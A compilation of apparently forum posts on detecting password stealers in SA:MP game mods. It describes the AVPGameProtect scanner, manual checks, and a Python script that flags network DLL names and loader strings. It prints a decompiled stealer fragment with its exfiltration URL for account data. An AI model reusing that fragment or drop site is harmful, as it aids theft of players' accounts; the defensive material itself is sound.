Check a file for a stealer online



The very first scanner, which appeared back in the days when the first ASI stealer was developed. The very next day after the stealer appeared, I began to develop my own anti-stealer.

The scanner includes the following modules:
- YARA signature engine (thanks to the VirusTotal programming team for such a powerful tool),
- AngelScript script engine from Andreas Jönsson: speed, ease of embedding and elegant scripts in one project. It is thanks to it that CLEO cryptors can be opened quickly and neatly.
- SCM code emulator, capable of unwinding CLEO cryptors quite well (written by me)

Program features:
- Quite a large database of stealers, which has been growing since about 2014. We have collected quite a few malicious mods from several large and not very large sites.
- Ability to scan folders and files by dragging them into the program window.
- Displays brief information about the malware (type, developer's nickname and, in older versions of the database, distributors' nicknames)
- Scan asi, dll, cleo, sf, cs and other potentially dangerous files.
- Detection of malicious code in files with a changed extension, for example, not so long ago it was fashionable to rename stealers into txd files and load them into the game using the loader.
- Unpacking encrypted CLEO scripts and subsequent scanning (it should be noted that it decrypts only known cryptors and those that we came across, but this fact is easy to fix, just write to us by email and send the file). When you scan the unpacked script, you can find the source of the latter in the temp\decrypt.cs file.
- Emulate SCM code on the fly and decrypt the script, followed by checking for malicious code. (If malicious code is detected, see the dump in temp\decrypt.cs)
- Friendly and intuitive program interface.
- High speed scanning when checking a large number of files.
- Built-in viewing of the found file in text and hex modes

Particularly important point! Everyone should read it so as not to ask stupid questions.
The scanner is designed only for checking game modifications unpacked from the archive; in any other case it is useless!
It is also NOT intended for installers and auto-installers, msi and exe packages, pif, mmbak, com, scr, vbs, bat, cmd, js and other potentially dangerous files not found in game mods; there are antiviruses for these files!
Also, you should NOT scan the entire system; it's useless and makes no sense. This scanner is tested on mods and is intended for mods only. You can scan the game folder, but you need to understand that the game has files that can access the Internet, and be prepared to see them in the scanner window.

I would like to warn you right away that this program will not protect your accounts 100%, like any other antivirus or scanner. When they write on the cover of an antivirus 100% protection, for me this is already a signal to remove the antivirus from the disk. But this scanner can speed up checking for already known stealers and help you avoid falling for the bait of inexperienced distributors.
The best antivirus is your head and your decisions: to download or not to download. Download mods only from trusted sites where the security of the archives is monitored.


The author of the program is not responsible for your decisions and possible stealers missed by the scanner.

Some program conventions:


Attention! A file has been detected that can establish an Internet connection, you should think about it before installing it in the game. But this could also be auto-updating of the script. It is also possible to have a URL in the file. It all depends on your ability to check files manually.

A CLEO stealer was found, the file was unpacked and you can look at the source.

The scanner tried to unpack the script, but it may not have worked, or the malicious code was not found. See the source in the temp folder. Make sure the file is not encrypted. Here you need to check the script manually.

Found a CLEO stealer in open form.

A file has been found that downloads malware onto your computer.

A stealer from a notorious project has been found.

Protection found, file may pose a threat. Here you just have to rely on the honesty and reputation of the author. Ask the author why the file was encrypted (protected), and then think for yourself about the adequacy of the answer. This file may well be dangerous.

Perhaps the file is blocked by another application, or the file is zero size

I do not recommend putting such files into the game. Anything can be expected here. This is several files merged into one. Among these files there may well be a stealer or other malware. Don't trust joined files. You can make sure that a joined file is safe only by splitting it into its files and checking each file separately.


We kindly ask you to download the program only from official sources. This is the safest option.
Please write about any errors by email or in this thread.


For dynamic account protection, we recommend using a special plugin from DarkP1xel.

This plugin blocks dangerous functions in scripts and other mods.
If you have this plugin installed in the game, then the mods will not be able to send web requests to third-party servers, which means that your samp password will not fall into the wrong hands, even if you accidentally installed the stealer in the game. The plugin also keeps a detailed log of all suspicious events in the game. Important. The plugin is constantly updated, stay tuned.
p.s: don’t forget to thank the author for the plugin;)

Thanks to everyone who helped us.
Special thanks to Gedwadion, DarkP1xel. These are cool guys who have a future in IT security.

Authors:
smalloff - development, project support
andre500 - testing, project support
Authors' websites (official sources): website, Libertycity.ru
Mail: smalloff@site
Download program: AVPGameProtect18042019.rar

(Attention! Support for the public project has been completely discontinued.)

[Serious voice of Chonishvili]: Without many words. Screw the show. While I’m writing this, your bulletin and villa on BB have already been merged into the state, and the virtuals have been transferred to the attacker, ah-ha-ha-ha, cough cough cough cough *choked*

You can cool your farts, because cleo files are not uploaded to the site. But this does not mean that they are prohibited on the Samp-Rp project. Don't get confused, damn it!
All fans of modifications have come across the term "stealer" (a.k.a. keylogger, but that's another story). Usually, stealers are put into cleo scripts, which we will talk about now.

What is a cleo script?

I won't explain what a cleo script is as a general concept; let's move straight to the online game. Cleo scripts for SA:MP are designed to improve the comfort of the game. Thanks to them, you can change the interface to suit you, fix various bugs, crashes, etc. But there are also malicious (or cheating) cleo scripts (cheat: English for deception), which, by the way, are strictly prohibited on the Samp-Rp project. They were created for children who are offended by life and who were beaten at school. Well, you can't help but insert the phrase: "Cheats are like Viagra, for those who can't do it themselves."
The most famous cleo scripts (.cs, cleo script, files) are an HP indicator in numbers, a square radar, a script that increases FPS, and various forms of armor and health bars (sometimes these are not even just bars but your favorite character, for example A$AP Rocky: as HP decreases, the photograph disappears and only the silhouette remains).
Many people are tormented by the question: why is there no ENB series on the site? The fact is that the .asi format is also a cleo file, only compiled. That is, a stealer can be embedded in it as well.
You're probably wondering why I'm writing this topic if there's no CLEO on the site anyway. It isn't on the site, but you need at least StreamMemFix1.0.asi, and this is just one of the many fixes for GTA; every fan of tuning up their San Andreas stuffs it with mods to capacity to make candy out of it. And I won't even mention c-huds and other modifications. Would you be sorry to lose your account? Then this topic is for you!

How to check a .cs file for a stealer?

The most common way is to check with the program Wireshark. All you need to do:

  • 1. Download the program itself (you can do this from the official website).
  • 2. Watch this video, everything is explained there clearly.

=====================================================================================================

The second way to check a CLEO script for a stealer. The latest version of the CLEO library comes with additional programs; one of them is called Sanny Builder, which is what we need.


0AB1: call_scm_func @stealer_by_mg 0 1@
:mg__steal__format_url

"http:" 2f 2f "candyquendy.hol.es " 2f "acci" 2f "add.php?" 00

candyquendy.hol.es - the site where account data is sent.
@stealer_by_mg 0 1@ - the nickname of the stealer's developer himself.

=================================================================================================

There is also a third way to check a file for a stealer. There is a script, "steal_logger.asi"; we'll use it for the check.
(Yes, it is itself in cleo format, but there is nothing to worry about as long as you don't log into your main account with it.) I won't give you a link to it; look for it on the Internet.
I will briefly explain how to use it.

  • 1. Put it in the game folder.
  • 2. Join any SA:MP server under any nickname.
  • 3. Come up with any password, log in and close the game.
  • 4. A text file (.txt format) should be created in the folder. Open it and look in the text for the line with the IP of our server and the password of the newly registered account. If it is found, the hacker already has this data. Let him be happy when he comes in to play with the whip. Meanwhile, we delete the last cleo file.

[!] Use only newly created accounts for the check; do not log into your main accounts with this script. After checking, delete it, or make a separate copy of GTA for checking scripts [!]

How to check an .asi file for a stealer?

The easy part is over. Now let's learn to check .asi files, because Wireshark does not see the stealer in them. What to do? I'll post a couple of the most well-known methods.

The most effective method: checking with the program IEInspector HTTP Analyzer.


===============================================================================================================

The second way is to check the code with notepad.

  • 1. Opening .asi via Notepad.
  • 2. Let's look at the code.

Example of clean code (no stealer)

Example of code with a stealer (not kernel.dll)


Let's pay attention to the last lines.

Another sign of a hidden stealer is the names "urlmon.dll", "wininet.dll", "wsock32.dll" in the text of the code itself, or the line "kernel32.dll ExitProcess user32.dll MessageBoxA wsprintfA LOADER ERROR".
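The Notepad check above, automated as an added example (not part of the original post and not AVPGameProtect's code): it looks for the three network DLL names, the loader-stub line and any embedded URL, and goes one step further by flagging a PE header ("MZ") under a non-plugin extension. The function names, the extension set and the sample bytes are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Strings named in the Notepad method above (matched case-insensitively).
NETWORK_DLLS = (b"urlmon.dll", b"wininet.dll", b"wsock32.dll")
# Pieces of the loader-stub line quoted above; all must be present.
LOADER_STUB = (b"ExitProcess", b"MessageBoxA", b"wsprintfA", b"LOADER ERROR")
URL_RE = re.compile(rb"https?://[\x21-\x7e]{4,200}", re.IGNORECASE)
# Assumption: extensions under which a PE image is expected in a mod folder.
PE_EXTS = {".asi", ".dll", ".sf", ".exe"}


def contains(data_lower: bytes, needle: bytes) -> bool:
    """True if needle occurs as an ASCII or UTF-16LE (wide) string."""
    n = needle.lower()
    return n in data_lower or n.decode("ascii").encode("utf-16-le") in data_lower


def triage(name: str, data: bytes) -> list[str]:
    """Return findings for one mod file; an empty list means nothing was seen."""
    findings = []
    low = data.lower()
    ext = Path(name).suffix.lower()
    if data[:2] == b"MZ" and ext not in PE_EXTS:
        findings.append(f"PE image hidden behind '{ext}' extension")
    for dll in NETWORK_DLLS:
        if contains(low, dll):
            findings.append(f"references {dll.decode()}")
    if all(contains(low, s) for s in LOADER_STUB):
        findings.append("loader stub strings (LOADER ERROR)")
    for m in URL_RE.finditer(data):
        findings.append("URL: " + m.group().decode("ascii"))
    return findings


def scan_folder(root: str) -> dict[str, list[str]]:
    """Triage every file under an unpacked mod folder; keep files with findings."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file():
            hits = triage(path.name, path.read_bytes())
            if hits:
                report[str(path)] = hits
    return report


if __name__ == "__main__":
    # Constructed samples, not real mods.
    fake_txd = b"MZ\x90\x00" + b"\x00" * 16 + b"WININET.dll\x00InternetOpenA\x00"
    print(triage("weapon.txd", fake_txd))
    print(triage("hud.cs", b"\x00http://stealer.example/add.php?\x00"))
    print(triage("readme.txt", b"plain text, nothing to see"))
```

A finding shows capability, not intent: a script with auto-update references the same DLLs, so treat the output as a list of files to inspect by hand.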

========================================================================================================

"The administration does not restore lost accounts," they said.
"Account security is in your hands." I hope that after reading this topic, your hands have become stronger. Take care of your accounts.

2015-2015 © Collected from various forums.

AVPGameProtect is a program that helps you search for malicious files in game modifications. The program's main advantage over other anti-stealers is mass scanning, i.e. you can scan absolutely any files in any quantity: just drag the necessary files or a folder with files into the program window and wait for the scan results.

Program features:
- Large database of stealers, which has been maintained since 2014.
- Scan asi, dll, cleo, sf, cs and other potentially dangerous files.
- High speed when scanning a large number of files.
- Display information about the stealer in the program window (type of stealer or developer's nickname).
- Built-in viewing of found files in text and hex modes.
- Search for functionality for interacting with the Internet or downloading files.
- Checking CLEO scripts for the presence of a stealer (not all, only those with cryptors known to the program). The decrypted script will appear in the temp folder, in the root folder of the program, under the name decrypt.cs
- Decryption of FuncCrypt from SR_Team and many others.
- Continuous support of the program.

The scanner is not intended for checking installers and game builds, or for a full PC scan. To scan, you need to extract a folder or files from the archive and drag them into the program.

It is also worth noting that the program does not protect users 100%. Like any other anti-stealer, it is intended only to identify stealers known to it, and the further decision to use this or that mod lies directly with you and the author is not responsible for YOUR decisions. The program will be constantly updated.

Some program conventions:
InetLoader - Attention! A file has been detected that can establish an Internet connection; you should think about it before downloading. But this could also be auto-updating of the script.
CLEO_Stealer - A CLEO stealer was found, the file was unpacked and you can look at the source.
CLEO_Crypter - The scanner tried to unpack the script; perhaps it did not work, or no malicious code was found. See the source in the temp folder.
CLEO_Stealer - Found a CLEO stealer in open form.
Downloader_stealer - Found a file that downloads malware onto your computer.
Stealers_ru - A stealer from a well-known project was found.
Danger_VMProtect - Protection found, file may pose a threat.
Failed to scan - The file may be blocked by another application, or the file is zero size.
JoinFiles - The scanner found several files merged into one. Among these files there may well be a stealer or other malware.

How can you avoid running into a stealer?!

A stealer is a script that is installed by copying a file with malicious code into the GTA folder. After installation, every time you log into the game server, it reads all data entered in dialogs (PIN codes, password, secret keys, other data) and sends it to the attacker. Thus, by simply installing the script in the GTA folder and entering the correct data into a dialog, you can lose all your game accounts.

At the moment, cases of theft of game accounts on various SA:MP servers have become more frequent. Most often these are servers with Role Play mode, since the game currency has its own value. Attackers make money from your stupidity. In this article I will show you the methods that I know. You know, the people who make these stealers live by the principle “If you don’t eat, you won’t live.”

Basic tips:

1. Always use all methods to protect the account provided to you by the administration of the project on which you play. (Graphic PIN code, SMS binding, etc. It all depends on the functionality of the server).
2. Use a password that is as long as possible and has a complex structure.
3. Do not log in to the server with a password that you use on others.
4. Do not share your account information with a person you are not 100% sure of.
5. I do not advise you to use various custom modifications in the game. They may contain an encrypted virus (stealer). A stealer (from the English "to steal") is a certain class of Trojans (malware, viruses, call it whatever you want) whose functionality consists entirely of stealing passwords stored in the system and sending them to the "author".
After you have installed a mod with a stealer, you will enter your password when entering the game and it will successfully pass into the hands of the thief. Stealers are most often embedded in mods such as HUDs, graphics settings and ASI plugins.
6. Use an antivirus! It does not allow you to send your saved mail or account to infected sites (protection against grabbers and stealers (exe)).
7. The SA:MP server administration does not restore hacked accounts and does not return money that was lost and will never ask for your account passwords.

First way.

So, the first method is 100% effective!!!
If you don’t download various mods, cleo scripts, cheats, then you won’t have ANY problems and NO stealers!

Check through the website:

The first method will protect against all hacks, but it is not suitable for everyone.
So the second method is suitable for those who download scripts, various mods, HUDs, cheats, and so on. I have a way out for you, but it will not protect you 100%! A site that checks files for various scripts, right here. By visiting the site you can read:

"The newest versions of stealers may have .txd .dff .png .dat formats. But they are loaded by .asi .cs .sf plugins and will not work without being loaded. Therefore, check all plugins and scripts using our checker. If you have hidden files in GTA, delete them."


From this we conclude that stealers can now be embedded in mods as an ordinary picture, even in a .png file. Many people say

“Are you a sheep or something? Get out of here! I’ve been playing SA:MP for 5 years and I know that stealers only come in mods or cleo formats!”

No, guys: as we can see, even a simple picture, say weapon.png, may be a stealer! Always check any mod, no matter how much you trust someone. So, when we check the file for a stealer, if it pops up

Search results information:

Stealer not found:

During the file scan, no malicious code or anything suspicious was found. This means you don't have to worry about your account; our checker uses all possible methods of detecting malicious code in scripts.

Program features:
- Quite a large database of stealers, which has been growing since about 2014. We have collected quite a few malicious mods from several large and not very large sites. Special thanks to the site Gtavicecity.ru for the samples provided.
- Ability to scan folders and files by dragging them into the program window.
- Displays brief information about the malicious program (type, developer's nickname and, in older versions of the database, distributors' nicknames)
- Scan asi, dll, cleo, sf, cs and other potentially dangerous files.
- Detection of malicious code in files with a changed extension, for example, not so long ago it was fashionable to rename stealers into txd files and load them into the game using the loader.
- Unpacking encrypted CLEO scripts and subsequent scanning (it should be noted that it decrypts only known cryptors and those that we came across, but this fact is easy to fix, just write to us by email and send the file). When you scan the unpacked script, you can find the source of the latter in the temp\decrypt.cs file.
- Emulate SCM code on the fly and decrypt the script, followed by checking for malicious code. (If malicious code is detected, see the dump in temp\decrypt.cs)
- Friendly and intuitive program interface.
- Quite a simple concept of the program, which means it can be easily and frequently updated.
- High scanning speed when scanning a large number of files.
- Built-in viewing of the found file in text and hex modes

The scanner is intended only for checking game modifications unpacked from the archive; in any other case it is useless.
It is also NOT intended for installers and auto-installers.

ATTENTION!!!
I would like to immediately warn you that this program will not protect your accounts 100%, like any other antivirus or scanner. When they write on the cover of an antivirus 100% protection, for me this is already a signal to remove the antivirus from the disk. But this scanner can speed up checking for already known stealers and help you avoid falling for the bait of inexperienced distributors.
The best antivirus is your head and decisions - to download or not to download. Download mods only from trusted sites and where the security of the archive is monitored.

Some program conventions:

In development

HttpAnalyzer is a network traffic analyzer. If you were looking for a functional tool whose purpose is to monitor HTTP and HTTPS traffic in real time, then I think you should like this program, it is a kind of sniffer that can clearly display all the necessary information about connections!

In general, HTTP Analyzer can do a lot of things, I think you can read in more detail on the official website, I wrote the main idea.